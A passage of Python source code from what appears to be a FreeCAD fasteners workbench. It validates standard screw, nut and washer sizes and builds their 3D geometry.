if ST_text == 'ASMEB18.3.4':
table = FsData["asmeb18.3.4def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.4range"]
Type_text = 'Screw'
if ST_text[:-1] == 'ASMEB18.3.5':
table = FsData["asmeb18.3.5def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.3.5range"]
Type_text = 'Screw'
if ST_text[:-1] == 'ASMEB18.5.5':
table = FsData["asmeb18.5.2def"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.5.2range"]
Type_text = 'Screw'
if ST_text == 'ASMEB18.6.3.1A':
table = FsData["asmeb18.6.3.1adef"]
tab_len = FsData["inch_fs_length"]
tab_range = FsData["asmeb18.6.3.1arange"]
Type_text = 'Screw'
if ST_text[:-1] == 'ASMEB18.21.1.12':
table = FsData["asmeb18.21.1.12def"]
Type_text = 'Washer'
if ST_text == 'ScrewTap':
table = FsData["tuningTable"]
Type_text = 'Screw-Tap'
if ST_text == 'ScrewDie':
table = FsData["tuningTable"]
Type_text = 'Screw-Die'
if ST_text == 'ThreadedRod':
table = FsData["tuningTable"]
Type_text = 'Threaded-Rod'
if ND_text not in table:
ND_min, ND_max = FsData["standard_diameters"][ST_text]
M_text = ST_text + ' has diameters from ' + ND_min + ' to ' + ND_max + ' and not ' + ND_text + '!'
self.objAvailable = False
# set scew not ok
else:
if Type_text == 'Screw':
# NL_text = str(self.NominalLength.currentText())
NL_min, NL_max = tab_range[ND_text]
NL_min_float = self.getLength(NL_min)
NL_max_float = self.getLength(NL_max)
if NL_text == 'User':
M_text = 'User length is only available for the screw-tab!'
self.objAvailable = False
else:
NL_text_float = self.getLength(NL_text)
if (NL_text_float < NL_min_float) or (NL_text_float > NL_max_float) or (NL_text not in tab_len):
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + ' has lengths from ' + NL_min + ' to ' + NL_max + ' and not ' + NL_text + '!'
self.objAvailable = False
# set screw not ok
else:
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + 'x' + NL_text + ' is in library available! '
self.objAvailable = True
# set screw ok
else: # Washers and Nuts
if not (Type_text == ('Screw-Tap' or 'Screw-Die' or 'Threaded-Rod')):
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + ' is in library available! '
self.objAvailable = True
# set washer/nut ok
else:
if NL_text == 'User':
M_text = 'Screw-tab with user length is ok!'
self.objAvailable = True
else:
# NL_text = str(self.NominalLength.currentText())
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
M_text = ST_text + '-' + ND_text + ' with ' + NL_text + 'mm length is in library available! '
self.objAvailable = True
# set screwTap ok
# print "Data checking: ", self.NominalLength.currentText(), "\n"
# FreeCAD.Console.PrintMessage("Set Check_result into text " + str(self.objAvailable) + M_text + "\n")
return M_text, self.objAvailable
def createScrew(self, ST_text, ND_text, NL_text, threadType, shapeOnly=False):
# self.simpThread = self.SimpleScrew.isChecked()
# self.symThread = self.SymbolThread.isChecked()
# self.rThread = self.RealThread.isChecked()
if threadType == 'real':
self.rThread = True
else:
self.rThread = False
if self.objAvailable:
try:
# first we check if valid numbers have been entered
# FreeCAD.Console.PrintMessage("NominalLength: " + self.NominalLength.currentText() + "\n")
# FreeCAD.Console.PrintMessage("NominalDiameter: " + self.NominalDiameter.currentText() + "\n")
# FreeCAD.Console.PrintMessage("SimpleThread: " + str(self.SimpleScrew.isChecked()) + "\n")
# FreeCAD.Console.PrintMessage("SymbolThread: " + str(self.SymbolThread.isChecked()) + "\n")
# FreeCAD.Console.PrintMessage("RealThread: " + str(self.RealThread.isChecked()) + "\n")
# ND_text = str(self.NominalDiameter.currentText())
# NL_text = str(self.NominalLength.currentText())
# ST_text = str(self.ScrewType.currentText())
# ST_text = ST_text.split(':')[0]
# dia = float(ND_text.lstrip('M'))
l = self.getLength(NL_text)
if ST_text == 'ISO4017':
table = FsData["iso4017head"]
if ST_text == 'ISO4014':
table = FsData["iso4014head"]
if ST_text == 'EN1662':
table = FsData["en1662def"]
if ST_text == 'EN1665':
table = FsData["en1665def"]
if ST_text == 'ISO2009':
table = FsData["iso2009def"]
if ST_text == 'ISO2010':
table = FsData["iso2009def"]
if ST_text == 'ISO4762':
table = FsData["iso4762def"]
if ST_text == 'ISO10642':
table = FsData["iso10642def"]
if ST_text == 'ISO1207':
table = FsData["iso1207def"]
if ST_text == 'ISO1580':
table = FsData["iso1580def"]
if ST_text == 'ISO7045':
table = FsData["iso7045def"]
if ST_text == 'ISO7046':
table = FsData["iso7045def"]
if ST_text == 'ISO7047':
table = FsData["iso7045def"]
if ST_text == 'ISO7048':
table = FsData["iso7048def"]
if ST_text == 'ISO7380-1':
table = FsData["iso7380def"]
if ST_text == 'ISO7380-2':
table = FsData["iso7380_2def"]
if ST_text == 'DIN967':
table = FsData["din967def"]
if ST_text == 'ISO14579':
table = FsData["iso14579def"]
if ST_text == 'ISO14580':
table = FsData["iso14580def"]
if ST_text == 'ISO14582':
table = FsData["iso14582def"]
if ST_text == 'ISO14583':
table = FsData["iso14583def"]
if ST_text == 'ISO14584':
table = FsData["iso14584def"]
if ST_text == 'ISO7089':
table = FsData["iso7089def"]
if ST_text == 'ISO7090':
table = FsData["iso7090def"]
if ST_text == 'ISO7091':
table = FsData["iso7091def"]
if ST_text == 'ISO7092':
table = FsData["iso7092def"]
if ST_text == 'ISO7093-1':
table = FsData["iso7093def"]
if ST_text == 'ISO7094':
table = FsData["iso7094def"]
if ST_text == 'ISO4026':
table = FsData["iso4026def"]
if ST_text == 'ISO4027':
table = FsData["iso4026def"]
if ST_text == 'ISO4028':
table = FsData["iso4028def"]
if ST_text == 'ISO4029':
table = FsData["iso4026def"]
if ST_text == 'ISO4032':
table = FsData["iso4032def"]
if ST_text == 'ISO4033':
table = FsData["iso4033def"]
if ST_text == 'ISO4035':
table = FsData["iso4035def"]
if ST_text == 'ISO4036':
table = FsData["iso4036def"]
if ST_text == 'EN1661':
table = FsData["en1661def"]
if ST_text == 'DIN7984':
table = FsData["din7984def"]
if ST_text == 'DIN6912':
table = FsData["din6912def"]
if ST_text == 'ISO7379':
table = FsData["iso7379def"]
if ST_text == 'ASMEB18.2.1.6':
table = FsData["asmeb18.2.1.6def"]
if ST_text == 'ASMEB18.2.1.8':
table = FsData["asmeb18.2.1.8def"]
if ST_text == 'ASMEB18.2.2.1A':
table = FsData["asmeb18.2.2.1adef"]
if ST_text[:-1] == 'ASMEB18.2.2.4':
table = FsData["asmeb18.2.2.4def"]
if ST_text == 'ASMEB18.3.1A':
table = FsData["asmeb18.3.1adef"]
if ST_text == 'ASMEB18.3.2':
table = FsData["asmeb18.3.2def"]
if ST_text == 'ASMEB18.3.3A':
table = FsData["asmeb18.3.3adef"]
if ST_text == 'ASMEB18.3.3B':
table = FsData["asmeb18.3.3bdef"]
if ST_text == 'ASMEB18.3.4':
table = FsData["asmeb18.3.4def"]
if ST_text[:-1] == 'ASMEB18.3.5':
table = FsData["asmeb18.3.5def"]
if ST_text == 'ASMEB18.6.3.1A':
table = FsData["asmeb18.6.3.1adef"]
if ST_text == 'ASMEB18.5.2':
table = FsData["asmeb18.5.2def"]
if ST_text[:-1] == 'ASMEB18.21.1.12':
table = FsData["asmeb18.21.1.12def"]
if (ST_text == 'ScrewTap') or (ST_text == 'ScrewDie') or (ST_text == 'ThreadedRod'):
table = FsData["tuningTable"]
if ND_text not in table:
FreeCAD.Console.PrintMessage("Combination of type " + ST_text \
+ " and diameter " + ND_text + " not available!" + "\n")
# self.MessageLabel.setText(_translate("ScrewMaker", "not implemented", None))
except ValueError:
# print "Error! nom_dia and length values must be valid numbers!"
FreeCAD.Console.PrintMessage("Error! nom_dia and length values must be valid numbers!\n")
else:
doc = FreeCAD.activeDocument()
done = False
if ST_text == 'ISO4014' or ST_text == 'ISO4017' or ST_text == 'ASMEB18.2.1.6':
screw = self.makeIso4017_2(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'EN1662' or ST_text == 'EN1665' or ST_text == 'ASMEB18.2.1.8':
screw = self.makeEN1662_2(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO2009' or ST_text == 'ISO2010' or \
ST_text == 'ISO1580' or ST_text == 'ASMEB18.6.3.1A':
screw = self.makeSlottedScrew(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO4762' or ST_text == 'ISO14579' or ST_text == 'DIN7984' or \
ST_text == 'DIN6912' or ST_text == 'ASMEB18.3.1A':
screw = self.makeIso4762(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO1207' or ST_text == 'ISO14580' or ST_text == 'ISO7048':
screw = self.makeIso1207(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7045' or ST_text == 'ISO14583':
screw = self.makeIso7045(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7046' or ST_text == 'ISO7047' or \
ST_text == 'ISO14582' or ST_text == 'ISO14584' or \
ST_text == 'ISO10642' or ST_text == 'ASMEB18.3.2':
screw = self.makeIso7046(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7380-1' or ST_text == 'ISO7380-2' or \
ST_text == 'DIN967' or ST_text == 'ASMEB18.3.3A' or \
ST_text == 'ASMEB18.3.3B':
screw = self.makeIso7380(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7379' or ST_text == 'ASMEB18.3.4':
screw = self.makeIso7379(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO7089' or ST_text == 'ISO7090' or ST_text == 'ISO7093-1' or \
ST_text == 'ISO7091' or ST_text == 'ISO7092' or ST_text == 'ISO7094' or \
ST_text[:-1] == 'ASMEB18.21.1.12':
screw = self.makeIso7089(ST_text, ND_text)
Type_text = 'Washer'
done = True
if ST_text == 'ISO4026' or ST_text == 'ISO4027' or \
ST_text == 'ISO4028' or ST_text == 'ISO4029' or \
ST_text[:-1] == 'ASMEB18.3.5':
screw = self.makeIso4026(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'ISO4032' or ST_text == 'ISO4033' or \
ST_text == 'ISO4035' or ST_text == 'ASMEB18.2.2.1A' or \
ST_text[:-1] == 'ASMEB18.2.2.4':
screw = self.makeIso4032(ST_text, ND_text)
Type_text = 'Nut'
done = True
if ST_text == 'ASMEB18.5.2':
screw = self.makeCarriageBolt(ST_text, ND_text, l)
Type_text = 'Screw'
done = True
if ST_text == 'EN1661':
screw = self.makeEN1661(ND_text)
Type_text = 'Nut'
done = True
if ST_text == 'ScrewTap':
screw = self.makeScrewTap(ND_text, l)
Type_text = 'Screw-Tap'
done = True
if ST_text == 'ScrewDie':
screw = self.makeScrewDie(ND_text, l)
Type_text = 'Screw-Die'
done = True
if ST_text == 'ThreadedRod':
screw = self.makeThreadedRod(ND_text, l, pitch)
Type_text = 'Threaded-Rod'
done = True
if not done:
FreeCAD.Console.PrintMessage("No valid Screw Type!" + "\n")
if '(' in ND_text:
ND_text = ND_text.lstrip('(').rstrip(')')
if Type_text == 'Screw':
label = ST_text + "-" + ND_text + "x" + NL_text + "_"
else:
if Type_text == 'Nut':
label = ST_text + '-' + ND_text + '_'
else:
if Type_text == ('Screw-Tap' or 'Screw-Die' or 'Threaded-Rod'):
label = ST_text + '-' + ND_text + 'x' + NL_text + '_'
else: # washer
label = ST_text + '-' + ND_text.lstrip('M') + '_'
if shapeOnly:
return screw
ScrewObj = doc.addObject("Part::Feature")
ScrewObj.Label = label
ScrewObj.Shape = screw
# FreeCAD.Console.PrintMessage("Placement: "+ str(ScrewObj.Placement) +"\n")
# FreeCAD.Console.PrintMessage("The label: "+ label +"\n")
self.moveScrew(ScrewObj)
# ScrewObj.Label = label
doc.recompute()
# Part.show(screw)
return ScrewObj
def moveScrew(self, ScrewObj_m):
# FreeCAD.Console.PrintMessage("In Move Screw: " + str(ScrewObj_m) + "\n")
mylist = FreeCAD.Gui.Selection.getSelectionEx()
if mylist.__len__() == 1:
# check selection
# FreeCAD.Console.PrintMessage("Selections: " + str(mylist.__len__()) + "\n")
Pnt1 = None
Axis1 = None
Axis2 = None
for o in Gui.Selection.getSelectionEx():
# for s in o.SubElementNames:
# FreeCAD.Console.PrintMessage( "name: " + str(s) + "\n")
for s in o.SubObjects:
# FreeCAD.Console.PrintMessage( "object: "+ str(s) + "\n")
if hasattr(s, "Curve"):
# FreeCAD.Console.PrintMessage( "The Object is a Curve!\n")
if hasattr(s.Curve, "Center"):
"""
FreeCAD.Console.PrintMessage( "The object has a Center!\n")
FreeCAD.Console.PrintMessage( "Curve attribute. "+ str(s.__getattribute__('Curve')) + "\n")
FreeCAD.Console.PrintMessage( "Center: "+ str(s.Curve.Center) + "\n")
FreeCAD.Console.PrintMessage( "Axis: "+ str(s.Curve.Axis) + "\n")
"""
Pnt1 = s.Curve.Center
Axis1 = s.Curve.Axis
if hasattr(s, 'Surface'):
# print 'the object is a face!'
if hasattr(s.Surface, 'Axis'):
Axis1 = s.Surface.Axis
if hasattr(s, 'Point'):
# FreeCAD.Console.PrintMessage( "the object seems to be a vertex! "+ str(s.Point) + "\n")
Pnt1 = s.Point
if Axis1 is not None:
# FreeCAD.Console.PrintMessage( "Got Axis1: " + str(Axis1) + "\n")
Axis2 = Base.Vector(0.0, 0.0, 1.0)
Axis2_minus = Base.Vector(0.0, 0.0, -1.0)
# Calculate angle
if Axis1 == Axis2:
normvec = Base.Vector(1.0, 0.0, 0.0)
result = 0.0
else:
if Axis1 == Axis2_minus:
normvec = Base.Vector(1.0, 0.0, 0.0)
result = math.pi
else:
normvec = Axis1.cross(Axis2) # Calculate axis of rotation = normvec
normvec.normalize() # Normalize for quaternion calculations
# normvec_rot = normvec
result = DraftVecUtils.angle(Axis1, Axis2, normvec) # Winkelberechnung
sin_res = math.sin(result / 2.0)
cos_res = math.cos(result / 2.0)
normvec.multiply(-sin_res) # Calculation of the quaternion elements
# FreeCAD.Console.PrintMessage( "Angle = "+ str(math.degrees(result)) + "\n")
# FreeCAD.Console.PrintMessage("Normal vector: "+ str(normvec) + "\n")
pl = FreeCAD.Placement()
pl.Rotation = (normvec.x, normvec.y, normvec.z, cos_res) # Drehungs-Quaternion
# FreeCAD.Console.PrintMessage("pl mit Rot: "+ str(pl) + "\n")
# neuPlatz = Part2.Object.Placement.multiply(pl)
neuPlatz = ScrewObj_m.Placement
# FreeCAD.Console.PrintMessage("the Position "+ str(neuPlatz) + "\n")
neuPlatz.Rotation = pl.Rotation.multiply(ScrewObj_m.Placement.Rotation)
neuPlatz.move(Pnt1)
# FreeCAD.Console.PrintMessage("the rot. Position: "+ str(neuPlatz) + "\n")
# make Washer
def makeIso7089(self, SType='ISO7089', ThreadType='M6'):
dia = self.getDia(ThreadType, True)
# FreeCAD.Console.PrintMessage("the disc with dia: " + str(dia) + "\n")
if SType == 'ISO7089':
d1_min, d2_max, h, h_max = FsData["iso7089def"][ThreadType]
if SType == 'ISO7090':
d1_min, d2_max, h, h_max = FsData["iso7090def"][ThreadType]
if SType == 'ISO7091':
d1_min, d2_max, h, h_max = FsData["iso7091def"][ThreadType]
if SType == 'ISO7092':
d1_min, d2_max, h, h_max = FsData["iso7092def"][ThreadType]
if SType == 'ISO7093-1':
d1_min, d2_max, h, h_max = FsData["iso7093def"][ThreadType]
if SType == 'ISO7094':
d1_min, d2_max, h, h_max = FsData["iso7094def"][ThreadType]
if SType == 'ASMEB18.21.1.12A':
d1_min, d2_a, d2_b, d2_c, h_a, h_b, h_c = FsData["asmeb18.21.1.12def"][ThreadType]
d2_max = d2_a
h_max = h_a
if SType == 'ASMEB18.21.1.12B':
d1_min, d2_a, d2_b, d2_c, h_a, h_b, h_c = FsData["asmeb18.21.1.12def"][ThreadType]
d2_max = d2_b
h_max = h_b
if SType == 'ASMEB18.21.1.12C':
d1_min, d2_a, d2_b, d2_c, h_a, h_b, h_c = FsData["asmeb18.21.1.12def"][ThreadType]
d2_max = d2_c
h_max = h_c
# FreeCAD.Console.PrintMessage("the disc with d1_min: " + str(d1_min) + "\n")
# Washer Points
Pnt0 = Base.Vector(d1_min / 2.0, 0.0, h_max)
Pnt2 = Base.Vector(d2_max / 2.0, 0.0, h_max)
Pnt3 = Base.Vector(d2_max / 2.0, 0.0, 0.0)
Pnt4 = Base.Vector(d1_min / 2.0, 0.0, 0.0)
if SType == 'ISO7090':
Pnt1 = Base.Vector(d2_max / 2.0 - h_max / 4.0, 0.0, h_max)
Pnt2 = Base.Vector(d2_max / 2.0, 0.0, h_max * 0.75)
edge1 = Part.makeLine(Pnt0, Pnt1)
edgeCham = Part.makeLine(Pnt1, Pnt2)
edge1 = Part.Wire([edge1, edgeCham])
else:
edge1 = Part.makeLine(Pnt0, Pnt2)
edge2 = Part.makeLine(Pnt2, Pnt3)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt0)
# FreeCAD.Console.PrintMessage("Edges made Pnt2: " + str(Pnt2) + "\n")
aWire = Part.Wire([edge1, edge2, edge3, edge4])
# Part.show(aWire)
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("Washer revolved: " + str(dia) + "\n")
return head
# make ISO 2009 Slotted countersunk flat head screws
# make ISO 2010 Slotted raised countersunk head screws
# make ISO 1580 Pan head slotted screw (Code is nearly identical to iso1207)
def makeSlottedScrew(self, SType='ISO1580', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
if SType == 'ISO1580':
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
# P, a, b, dk, dk_mean, da, k, n_min, r, t_min, x = iso1580def[ThreadType]
P, a, b, dk_max, da, k, n_min, r, rf, t_min, x = FsData["iso1580def"][ThreadType]
# FreeCAD.Console.PrintMessage("the head with iso: " + str(dk_max) + "\n")
ht = k
headEnd = r
# Length for calculation of head fillet
sqrt2_ = 1.0 / math.sqrt(2.0)
r_fil = rf
beta = math.radians(5.0) # angle of pan head edge
alpha = math.radians(90.0 - (90.0 + 5.0) / 2.0)
tan_beta = math.tan(beta)
# top head diameter without fillet
rK_top = dk_max / 2.0 - k * tan_beta
fillet_center_x = rK_top - r_fil + r_fil * tan_beta
fillet_center_z = k - r_fil
fillet_arc_x = fillet_center_x + r_fil * math.sin(alpha)
fillet_arc_z = fillet_center_z + r_fil * math.cos(alpha)
# FreeCAD.Console.PrintMessage("rK_top: " + str(rK_top) + "\n")
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
# Head Points
Pnt0 = Base.Vector(0.0, 0.0, k)
Pnt2 = Base.Vector(fillet_center_x, 0.0, k)
Pnt3 = Base.Vector(fillet_arc_x, 0.0, fillet_arc_z)
Pnt4 = Base.Vector(fillet_center_x + r_fil * math.cos(beta), 0.0, fillet_center_z + r_fil * math.sin(beta))
Pnt5 = Base.Vector(dk_max / 2.0, 0.0, 0.0)
Pnt6 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt7 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
# Pnt8 = Base.Vector(dia/2.0,0.0,-r) # end of fillet
PntR = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
PntT0 = Base.Vector(0.0, 0.0, -r) # helper point for real thread
edge1 = Part.makeLine(Pnt0, Pnt2)
edge2 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge3 = Part.makeLine(Pnt4, Pnt5)
edge4 = Part.makeLine(Pnt5, Pnt6)
edge5 = Part.Arc(Pnt6, Pnt7, PntR).toShape()
headWire = Part.Wire([edge1, edge2, edge3, edge4, edge5])
if SType == 'ISO2009' or SType == 'ISO2010' or SType == 'ASMEB18.6.3.1A':
if SType == 'ISO2009' or SType == 'ISO2010':
P, a, b, dk_theo, dk_mean, k, n_min, r, t_mean, x = FsData["iso2009def"][ThreadType]
elif SType == 'ASMEB18.6.3.1A':
P, b, dk_theo, dk_mean, k, n_min, r, t_mean = FsData["asmeb18.6.3.1adef"][ThreadType]
dk_max = dk_theo
t_min = t_mean
ht = 0.0 # Head height of flat head
if SType == 'ISO2010':
rf, t_mean, cT, mH, mZ = FsData["Raised_countersunk_def"][ThreadType]
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_mean / 2.0 / rf) # angle of head edge
tan_beta = math.tan(beta)
alpha = beta / 2.0 # half angle
# height of raised head top
ht = rf - (dk_mean / 2.0) / tan_beta
h_arc_x = rf * math.sin(alpha)
h_arc_z = ht - rf + rf * math.cos(alpha)
cham = (dk_theo - dk_mean) / 2.0
rad225 = math.radians(22.5)
rad45 = math.radians(45.0)
rtan = r * math.tan(rad225)
headEnd = k + rtan
if b > l - k - rtan / 2.0 - 1.0 * P:
bmax = l - k - rtan / 2.0 - 1.0 * P
else:
bmax = b
# Head Points
Pnt0 = Base.Vector(0.0, 0.0, ht)
Pnt1 = Base.Vector(dk_mean / 2.0, 0.0, 0.0)
Pnt2 = Base.Vector(dk_mean / 2.0, 0.0, -cham)
Pnt3 = Base.Vector(dia / 2.0 + r - r * math.cos(rad45), 0.0, -k - rtan + r * math.sin(rad45))
# Arc-points
Pnt4 = Base.Vector(dia / 2.0 + r - r * (math.cos(rad225)), 0.0, -k - rtan + r * math.sin(rad225))
PntR = Base.Vector(dia / 2.0, 0.0, -k - rtan)
# PntA = Base.Vector(dia/2.0,0.0,-a_point)
PntT0 = Base.Vector(0.0, 0.0, -k - rtan) # helper point for real thread
if SType == 'ISO2010': # make raised head rounding
Pnt0arc = Base.Vector(h_arc_x, 0.0, h_arc_z)
edge1 = Part.Arc(Pnt0, Pnt0arc, Pnt1).toShape()
else:
edge1 = Part.makeLine(Pnt0, Pnt1) # make flat head
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.makeLine(Pnt2, Pnt3)
edgeArc = Part.Arc(Pnt3, Pnt4, PntR).toShape()
headWire = Part.Wire([edge1, edge2, edge3, edgeArc])
### make the new code with math.modf(l)
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = headEnd - a_point
PntA = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
if self.rThread:
edgeZ1 = Part.makeLine(PntR, PntT0)
edgeZ0 = Part.makeLine(PntT0, Pnt0)
aWire = Part.Wire([headWire, edgeZ1, edgeZ0])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeZ0 = Part.makeLine(PntB2, Pnt0)
if a_point <= r:
edgeB1 = Part.makeLine(PntR, PntB1)
aWire = Part.Wire([headWire, edgeB1, edgeB2, edgeZ0])
else:
edgeRA = Part.makeLine(PntR, PntA)
edgeB1 = Part.makeLine(PntA, PntB1)
aWire = Part.Wire([headWire, edgeRA, edgeB1, edgeB2, edgeZ0])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Parameter for slot-recess: dk_max, n_min, k, t_min
slot = Part.makePlane(dk_max, n_min, \
Base.Vector(dk_max / 2.0, -n_min / 2.0, ht + 1.0), Base.Vector(0.0, 0.0, -1.0))
slot = slot.extrude(Base.Vector(0.0, 0.0, -t_min - 1.0))
# Part.show(slot)
head = head.cut(slot)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
# Part.show(head)
if self.rThread:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# Part.show(rthread)
headFaces = []
if SType == 'ISO2009' or SType == 'ASMEB18.6.3.1A':
for i in range(0, len(head.Faces) - 2):
headFaces.append(head.Faces[i])
headFaces.append(head.Faces[len(head.Faces) - 1])
if SType == 'ISO1580' or SType == 'ISO2010':
for i in range(0, len(head.Faces) - 1):
headFaces.append(head.Faces[i])
for threadFace in rthread.Faces:
headFaces.append(threadFace)
newHeadShell = Part.Shell(headFaces)
# Part.show(newHeadShell)
head = Part.Solid(newHeadShell)
return head
# ISO 7045 Pan head screws with type H or type Z cross recess
# ISO 14583 Hexalobular socket pan head screws
def makeIso7045(self, SType='ISO7045', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
P, a, b, dk_max, da, k, r, rf, x, cT, mH, mZ = FsData["iso7045def"][ThreadType]
# FreeCAD.Console.PrintMessage("the head with iso: " + str(dk_max) + "\n")
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_max / 2.0 / rf) # angle of head edge
# print 'beta: ', math.degrees(beta)
tan_beta = math.tan(beta)
if SType == 'ISO14583':
tt, A, t_mean = FsData["iso14583def"][ThreadType]
beta_A = math.asin(A / 2.0 / rf) # angle of recess edge
tan_beta_A = math.tan(beta_A)
alpha = (beta_A + beta) / 2.0 # half angle
# print 'alpha: ', math.degrees(alpha)
# height of head edge
he = k - A / 2.0 / tan_beta_A + (dk_max / 2.0) / tan_beta
# print 'he: ', he
h_arc_x = rf * math.sin(alpha)
h_arc_z = k - A / 2.0 / tan_beta_A + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("h_arc_z: " + str(h_arc_z) + "\n")
else:
alpha = beta / 2.0 # half angle
# print 'alpha: ', math.degrees(alpha)
# height of head edge
he = k - rf + (dk_max / 2.0) / tan_beta
# print 'he: ', he
h_arc_x = rf * math.sin(alpha)
h_arc_z = k - rf + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("h_arc_z: " + str(h_arc_z) + "\n")
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
### make the new code with math.modf(l)
residue, turns = math.modf(bmax / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a_point
# FreeCAD.Console.PrintMessage("The transition at a: " + str(a) + " turns " + str(turns) + "\n")
sqrt2_ = 1.0 / math.sqrt(2.0)
# Head Points
Pnt1 = Base.Vector(h_arc_x, 0.0, h_arc_z)
Pnt2 = Base.Vector(dk_max / 2.0, 0.0, he)
Pnt3 = Base.Vector(dk_max / 2.0, 0.0, 0.0)
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt5 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt6 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt7 = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
# FreeCAD.Console.PrintMessage("Points defined a_point: " + str(a_point) + "\n")
if SType == 'ISO14583':
# Pnt0 = Base.Vector(0.0,0.0,k-A/4.0)
Pnt0 = Base.Vector(0.0, 0.0, k - A / 8.0)
PntFlat = Base.Vector(A / 8.0, 0.0, k - A / 8.0)
PntCham = Base.Vector(A / 1.99, 0.0, k)
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, PntCham)
edgeCham2 = Part.Arc(PntCham, Pnt1, Pnt2).toShape()
# edge1 = Part.Wire([edgeCham0,edgeCham1,edgeCham2])
edge1 = Part.Wire([edgeCham0, edgeCham1])
edge2 = Part.makeLine(Pnt2, Pnt3)
edge2 = Part.Wire([edgeCham2, edge2])
# Part.show(edge2)
# Here is the next approach to shorten the head building time
# Make two helper points to create a cutting tool for the
# recess and recess shell.
PntH1 = Base.Vector(A / 1.99, 0.0, 2.0 * k)
PntH2 = Base.Vector(0.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(PntCham, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, Pnt0)
else:
Pnt0 = Base.Vector(0.0, 0.0, k)
edge1 = Part.Arc(Pnt0, Pnt1, Pnt2).toShape() # make round head
edge2 = Part.makeLine(Pnt2, Pnt3)
# Here is the next approach to shorten the head building time
# Make two helper points to create a cutting tool for the
# recess and recess shell.
PntH1 = Base.Vector(dk_max / 2.0, 0.0, 2.0 * k)
PntH2 = Base.Vector(0.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(Pnt2, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, Pnt0)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.Arc(Pnt4, Pnt5, Pnt6).toShape()
# FreeCAD.Console.PrintMessage("Edges made h_arc_z: " + str(h_arc_z) + "\n")
# if self.RealThread.isChecked():
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
if a_point <= (r + 0.00001):
edgeB1 = Part.makeLine(Pnt6, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edgeB1, edgeB2])
else:
edge5 = Part.makeLine(Pnt6, Pnt7)
